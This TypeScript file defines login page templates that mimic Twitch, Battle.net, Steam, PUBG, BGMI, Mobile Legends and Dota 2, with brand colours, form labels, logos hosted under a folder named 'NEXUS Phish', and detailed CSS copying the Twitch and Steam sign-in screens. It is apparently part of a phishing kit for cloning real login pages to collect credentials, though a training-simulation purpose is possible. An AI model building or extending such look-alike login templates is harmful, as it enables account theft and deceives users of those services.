import { Gamepad2, GalleryVerticalEnd, MessageSquare } from "lucide-react";
import { LoginTemplate } from "./types";

export const gamingTemplates: LoginTemplate[] = [
  {
    id: "twitch",
    name: "Twitch",
    description: "Log in to Twitch",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/twitch.png?updatedAt=1742185018609",
    primaryColor: "#9147FF",
    secondaryColor: "#FFFFFF",
    backgroundColor: "#FFFFFF",
    usernameLabel: "Username",
    usernameType: "text",
    passwordLabel: "Password",
    buttonText: "Log In",
    forgotPasswordText: "Trouble logging in?",
    signupText: "Don't have an account? Sign up",
    customCSS: `
      .twitch-container {
        min-height: 100vh;
        background-color: #f7f7f8;
        display: flex;
        flex-direction: column;
      }
      
      .twitch-header {
        background: #ffffff;
        height: 50px;
        display: flex;
        align-items: center;
        padding: 0 20px;
        border-bottom: 1px solid #e5e5e5;
      }
      
      .twitch-logo {
        height: 32px;
      }
      
      .twitch-content {
        flex: 1;
        display: flex;
        align-items: center;
        justify-content: center;
        padding: 30px 20px;
      }
      
      .twitch-modal {
        background: #ffffff;
        border-radius: 4px;
        width: 100%;
        max-width: 400px;
        padding: 30px;
      }
      
      .twitch-title {
        font-size: 24px;
        font-weight: 600;
        margin-bottom: 30px;
        text-align: center;
      }
      
      .twitch-input-label {
        font-size: 14px;
        font-weight: 600;
        margin-bottom: 5px;
        color: #0e0e10;
      }
      
      .twitch-input {
        width: 100%;
        height: 40px;
        padding: 10px;
        border: 1px solid #dedee3;
        border-radius: 4px;
        font-size: 14px;
        background: #ffffff;
      }
      
      .twitch-input:focus {
        border-color: #9147ff;
        box-shadow: 0 0 0 1px #9147ff;
      }
      
      .twitch-btn {
        width: 100%;
        height: 40px;
        background-color: #9147ff;
        color: white;
        font-size: 14px;
        font-weight: 600;
        border: none;
        border-radius: 4px;
        cursor: pointer;
        margin-top: 20px;
      }
      
      .twitch-btn:hover {
        background-color: #772ce8;
      }
      
      .twitch-trouble {
        color: #9147ff;
        font-size: 14px;
        text-decoration: none;
        display: block;
        text-align: center;
        margin-top: 20px;
      }
      
      .twitch-trouble:hover {
        color: #772ce8;
        text-decoration: underline;
      }
      
      .twitch-signup {
        text-align: center;
        margin-top: 20px;
        font-size: 14px;
        color: #53535f;
      }
      
      .twitch-signup-link {
        color: #9147ff;
        text-decoration: none;
        font-weight: 600;
      }
      
      .twitch-signup-link:hover {
        color: #772ce8;
        text-decoration: underline;
      }
    `,
    category: "gaming"
  },
  {
    id: "battle-net",
    name: "Battle.net",
    description: "Access your Battle.net account",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/battle-net.png?updatedAt=1744041234567",
    primaryColor: "#1385C4",
    secondaryColor: "#00A3E0",
    usernameLabel: "Email or Phone",
    usernameType: "text",
    passwordLabel: "Password",
    buttonText: "Log In",
    forgotPasswordText: "Can't log in?",
    signupText: "Create a free Battle.net Account",
    category: "gaming"
  },
  {
    id: "steam",
    name: "Steam",
    description: "Sign in to Steam",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/steam-logo.png?updatedAt=1744041234567",
    primaryColor: "#00adee",
    secondaryColor: "#FFFFFF",
    backgroundColor: "#181A21",
    usernameLabel: "SIGN IN WITH ACCOUNT NAME",
    usernameType: "text",
    passwordLabel: "PASSWORD",
    buttonText: "Sign in",
    forgotPasswordText: "Help, I can't sign in",
    signupText: "Create a new account",
    additionalOptions: [
      { text: "Remember me", isCheckbox: true },
      { text: "Help, I can't sign in", url: "#" }
    ],
    customCSS: `
      .steam-container {
        background: linear-gradient(to bottom, rgba(24,26,33,0.8) 0%,rgba(24,26,33,1) 100%);
        min-height: 100vh;
        display: flex;
        flex-direction: column;
      }
      
      .steam-header {
        background: linear-gradient(90deg, rgba(62, 103, 150, 0.919) 11.38%, rgba(58, 120, 177, 0.8) 25.23%, rgb(15, 33, 110) 100%);
        height: 104px;
        display: flex;
        align-items: center;
        padding: 0 48px;
        position: fixed;
        top: 0;
        left: 0;
        right: 0;
        z-index: 100;
      }
      
      .steam-nav {
        display: flex;
        gap: 24px;
        margin-left: 48px;
      }
      
      .steam-nav-link {
        color: #ffffff;
        font-size: 14px;
        text-transform: uppercase;
        text-decoration: none;
        padding: 8px 0;
      }
      
      .steam-nav-link:hover {
        color: #66c0f4;
      }
      
      .steam-login-container {
        flex: 1;
        display: flex;
        align-items: center;
        justify-content: center;
        padding: 150px 0 60px;
      }
      
      .steam-login-content {
        display: flex;
        gap: 64px;
        align-items: flex-start;
        max-width: 1000px;
        width: 100%;
        margin: 0 auto;
        padding: 0 24px;
      }
      
      .steam-login-form {
        flex: 1;
        max-width: 450px;
      }
      
      .steam-qr {
        background: rgba(0, 0, 0, 0.3);
        padding: 24px;
        border-radius: 4px;
        text-align: center;
      }
      
      .steam-qr-title {
        color: #ffffff;
        font-size: 16px;
        margin-bottom: 16px;
      }
      
      .steam-qr-code {
        width: 200px;
        height: 200px;
        margin-bottom: 16px;
      }
      
      .steam-qr-text {
        color: #8f98a0;
        font-size: 12px;
        line-height: 1.5;
      }
      
      .steam-input-label {
        color: #1999ff;
        font-size: 12px;
        text-transform: uppercase;
        margin-bottom: 8px;
      }
      
      .steam-input {
        width: 100%;
        background: #32353c;
        border: 1px solid #32353c;
        color: #ffffff;
        padding: 10px;
        border-radius: 2px;
        font-size: 15px;
      }
      
      .steam-input:focus {
        border-color: #00adee;
        outline: none;
      }
      
      .steam-checkbox {
        display: flex;
        align-items: center;
        gap: 8px;
        margin: 16px 0;
      }
      
      .steam-checkbox input {
        width: 16px;
        height: 16px;
      }
      
      .steam-checkbox label {
        color: #afafaf;
        font-size: 12px;
      }
      
      .steam-btn {
        width: 100%;
        background: linear-gradient(90deg, #06BFFF 0%, #2D73FF 100%);
        border: none;
        color: white;
        padding: 12px;
        border-radius: 2px;
        font-size: 16px;
        cursor: pointer;
      }
      
      .steam-btn:hover {
        background: linear-gradient(90deg, #06BFFF 30%, #2D73FF 100%);
      }
      
      .steam-help {
        color: #afafaf;
        font-size: 12px;
        text-decoration: none;
        margin-top: 16px;
        display: block;
        text-align: center;
      }
      
      .steam-help:hover {
        color: #ffffff;
      }
      
      .steam-signup {
        margin-top: 16px;
        text-align: center;
      }
      
      .steam-signup a {
        color: #afafaf;
        font-size: 12px;
        text-decoration: none;
      }
      
      .steam-signup a:hover {
        color: #ffffff;
      }
    `,
    category: "gaming"
  },
  {
    id: "pubg",
    name: "PUBG",
    description: "Log in to PUBG",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/Pubg.jpg?updatedAt=1742185018198",
    primaryColor: "#FFC600",
    secondaryColor: "#0A0A0A",
    backgroundColor: "#2A2A2A",
    usernameLabel: "Email or Username",
    usernameType: "text",
    passwordLabel: "Password",
    buttonText: "LOG IN",
    forgotPasswordText: "Forgot Password?",
    signupText: "Create a PUBG Account",
    additionalOptions: [
      { text: "Login with Steam", url: "#" },
      { text: "Login with Google", url: "#" },
      { text: "Login with Facebook", url: "#" }
    ],
    category: "gaming"
  },
  {
    id: "bgmi",
    name: "BGMI",
    description: "Login to Battlegrounds Mobile India",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/bgmi.jpg?updatedAt=1742185018565",
    primaryColor: "#FFD700",
    secondaryColor: "#AA8800",
    backgroundColor: "#111111",
    usernameLabel: "Player ID or Email",
    usernameType: "text",
    passwordLabel: "Password",
    buttonText: "LOGIN",
    forgotPasswordText: "Forgot Password?",
    signupText: "Create New Account",
    additionalOptions: [
      { text: "Login with Facebook", url: "#" },
      { text: "Login with Google", url: "#" },
      { text: "Login with Twitter", url: "#" }
    ],
    category: "gaming"
  },
  {
    id: "mobilelegends",
    name: "Mobile Legends",
    description: "Connect to Mobile Legends",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/mobile-legends.png?updatedAt=1742180425571",
    primaryColor: "#F44336",
    secondaryColor: "#9C27B0",
    backgroundColor: "#000",
    usernameLabel: "Account ID",
    usernameType: "text",
    passwordLabel: "Password",
    buttonText: "Log In",
    forgotPasswordText: "Forgot password?",
    signupText: "Don't have an account? Create one",
    category: "gaming"
  },
  {
    id: "dota2",
    name: "Dota 2",
    description: "Log in to Dota 2",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/dota2.png?updatedAt=1744041234567",
    primaryColor: "#C9AF75",
    secondaryColor: "#A08453",
    backgroundColor: "#000",
    usernameLabel: "Steam Username",
    usernameType: "text",
    passwordLabel: "Password",
    buttonText: "Sign in",
    forgotPasswordText: "Forgot your password?",
    signupText: "Create a Steam account",
    category: "gaming"
  }
];